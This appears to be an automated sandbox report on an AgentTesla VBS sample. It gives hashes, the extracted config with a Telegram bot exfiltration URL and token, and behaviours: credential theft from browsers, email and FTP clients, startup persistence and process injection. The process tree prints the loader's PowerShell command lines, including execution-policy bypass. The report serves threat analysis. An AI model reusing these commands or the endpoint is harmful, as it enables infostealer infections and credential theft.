Analysis
- max time kernel: 56s
- max time network: 55s
- platform: windows10-2004_x64
- resource: win10v2004-20240419-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30-04-2024 01:22

Static task: static1

Behavioral task: behavioral1
- Sample: 28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
- Resource: win7-20240221-en

Behavioral task: behavioral2
- Sample: 28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
- Resource: win10v2004-20240419-en
General
- Target: 28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs
- Size: 297KB
- MD5: 6f56f9adf7bc5d555743d7f9af963e1a
- SHA1: fcff87c7393b15e4db5db7fe9c92ea22d878aebf
- SHA256: 28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f
- SHA512: 8d5381f64c1f084131c90344c41a8abe6b9d5f6680b2edfe8c0611386566c59b42ab8337c7d729ba3637bb2262af2a9521fee9ea166a3d02aa32405db3dd6113
- SSDEEP: 6144:S1b5FHcTMW5dXdwYLJd+ePCCvlrnCgUhfVseeDoh1yYvczYz:S1tZBWB1aeR1CfieeDohQA
Malware Config
Extracted
- Family: agenttesla
- URL: https://api.telegram.org/bot6848173762:AAGkzL4gp0AnmZ6UfiPCUuUFvn7Vkjdjn1M/
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation | WScript.exe
- Drops startup file (2 IoCs)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koFiVp.vbs | powershell.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koFiVp.vbs | powershell.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow | ioc):
    4 | api.ipify.org
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description | pid | process | target process):
    PID 3924 set thread context of 3372 | 3924 | powershell.exe | RegAsm.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid | process):
    1220 | powershell.exe (listed twice)
    3924 | powershell.exe (repeated for the remaining entries)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1220 | powershell.exe
    Token: SeDebugPrivilege | 3924 | powershell.exe
    Token: SeDebugPrivilege | 3372 | RegAsm.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes (pid | process):
    3372 | RegAsm.exe
- Suspicious use of WriteProcessMemory (16 IoCs)
  Processes (description | pid | process | target process):
    PID 3612 wrote to memory of 1468 | 3612 | WScript.exe | cmd.exe (2 entries)
    PID 1468 wrote to memory of 1220 | 1468 | cmd.exe | powershell.exe (3 entries)
    PID 1468 wrote to memory of 3924 | 1468 | cmd.exe | powershell.exe (3 entries)
    PID 3924 wrote to memory of 3372 | 3924 | powershell.exe | RegAsm.exe (8 entries)
Processes
- C:\Windows\System32\WScript.exe (level 1)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (level 2)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\koFiVp.bat" "
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('<base64-encoded PowerShell payload omitted>')) | Out-File -FilePath 'C:\Users\Admin\koFiVp.ps1' -Encoding UTF8"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\koFiVp.ps1"
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (level 4)
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 1KB
  MD5: 4280e36a29fa31c01e4d8b2ba726a0d8
  SHA1: c485c2c9ce0a99747b18d899b71dfa9a64dabe32
  SHA256: e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
  SHA512: 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 16KB
  MD5: 7e6b75f6608d2e82f467f73e39143ee9
  SHA1: 9a2d7b03eea7cb8e8b2b07b851874a702cda5ce5
  SHA256: 3012fb2403f3b6a7975054eef075d1e56dbd6fbb55820b2fe55698c8468e6bf6
  SHA512: 23d8c6bccf32b6459f2ae8a65e139b567cb81433b21cc84154afe9426e5cf27b45b08c363e170c0f4d79a14c987ba36ae0e82d8248f35bfdf0c1bd49fdbea5f1
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2olkdk5.zrz.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\koFiVp.bat
  Filesize: 277KB
  MD5: 0b559157fc24f3d30eb86f521b90ca05
  SHA1: b14552d2a9e30c65c4b2ab3975f2c28a70e7482c
  SHA256: 848a86578531474c2ab7a0a24e893e4622e794e2f56041902f9d7a0f5b442e57
  SHA512: 8e782ef7bd83a5693ca04b2905d71a2d9b30170cf47c92d10730d09e5127b0fe0c8128e0b3ccbbb1f55bbfb1fe3118d939e21748762f49f41587f6c2b4870d20
- C:\Users\Admin\koFiVp.ps1
  Filesize: 2KB
  MD5: 81a0dc1efcbb4347d8204ba454c530bd
  SHA1: d11b2417f0f008c036873c7a610adc2088c80f1d
  SHA256: 9920dbc679fdd1c800a11a40d2b22ca65f1a4a96e4e173505c1c27f09c80e760
  SHA512: 9116d86b1bf980da6f68e4ad07e8805030d0941d298dd58c80b16f5c9b8ffd48c9c72c75b8588180b85adc9766401531dc43cdc32da345712913c73d8563f0e0
- C:\Users\Admin\koFiVp.vbs
  Filesize: 297KB
  MD5: 6f56f9adf7bc5d555743d7f9af963e1a
  SHA1: fcff87c7393b15e4db5db7fe9c92ea22d878aebf
  SHA256: 28a11a70ff2b31bebb28fa2193a39ade7ce17f4478beb57f60405ea7452e988f
  SHA512: 8d5381f64c1f084131c90344c41a8abe6b9d5f6680b2edfe8c0611386566c59b42ab8337c7d729ba3637bb2262af2a9521fee9ea166a3d02aa32405db3dd6113
- memory/1220-29-0x0000000075130000-0x00000000758E0000-memory.dmp: 7.7MB
- memory/1220-7-0x0000000004C90000-0x0000000004CA0000-memory.dmp: 64KB
- memory/1220-10-0x0000000005970000-0x00000000059D6000-memory.dmp: 408KB
- memory/1220-21-0x0000000005AC0000-0x0000000005E14000-memory.dmp: 3.3MB
- memory/1220-22-0x0000000005F60000-0x0000000005F7E000-memory.dmp: 120KB
- memory/1220-23-0x0000000005FB0000-0x0000000005FFC000-memory.dmp: 304KB
- memory/1220-24-0x00000000078B0000-0x0000000007F2A000-memory.dmp: 6.5MB
- memory/1220-25-0x00000000064A0000-0x00000000064BA000-memory.dmp: 104KB
- memory/1220-9-0x00000000051C0000-0x00000000051E2000-memory.dmp: 136KB
- memory/1220-8-0x00000000052D0000-0x00000000058F8000-memory.dmp: 6.2MB
- memory/1220-6-0x0000000075130000-0x00000000758E0000-memory.dmp: 7.7MB
- memory/1220-11-0x0000000005A50000-0x0000000005AB6000-memory.dmp: 408KB
- memory/1220-5-0x0000000004BA0000-0x0000000004BD6000-memory.dmp: 216KB
- memory/3372-49-0x0000000000400000-0x0000000000442000-memory.dmp: 264KB
- memory/3372-51-0x00000000065C0000-0x0000000006610000-memory.dmp: 320KB
- memory/3372-52-0x00000000066B0000-0x0000000006742000-memory.dmp: 584KB
- memory/3372-53-0x0000000006670000-0x000000000667A000-memory.dmp: 40KB
- memory/3924-43-0x00000000070B0000-0x00000000070D2000-memory.dmp: 136KB
- memory/3924-44-0x0000000007780000-0x0000000007D24000-memory.dmp: 5.6MB
- memory/3924-45-0x00000000072A0000-0x000000000731E000-memory.dmp: 504KB
- memory/3924-42-0x0000000007130000-0x00000000071C6000-memory.dmp: 600KB
- memory/3924-48-0x00000000026A0000-0x00000000026AA000-memory.dmp: 40KB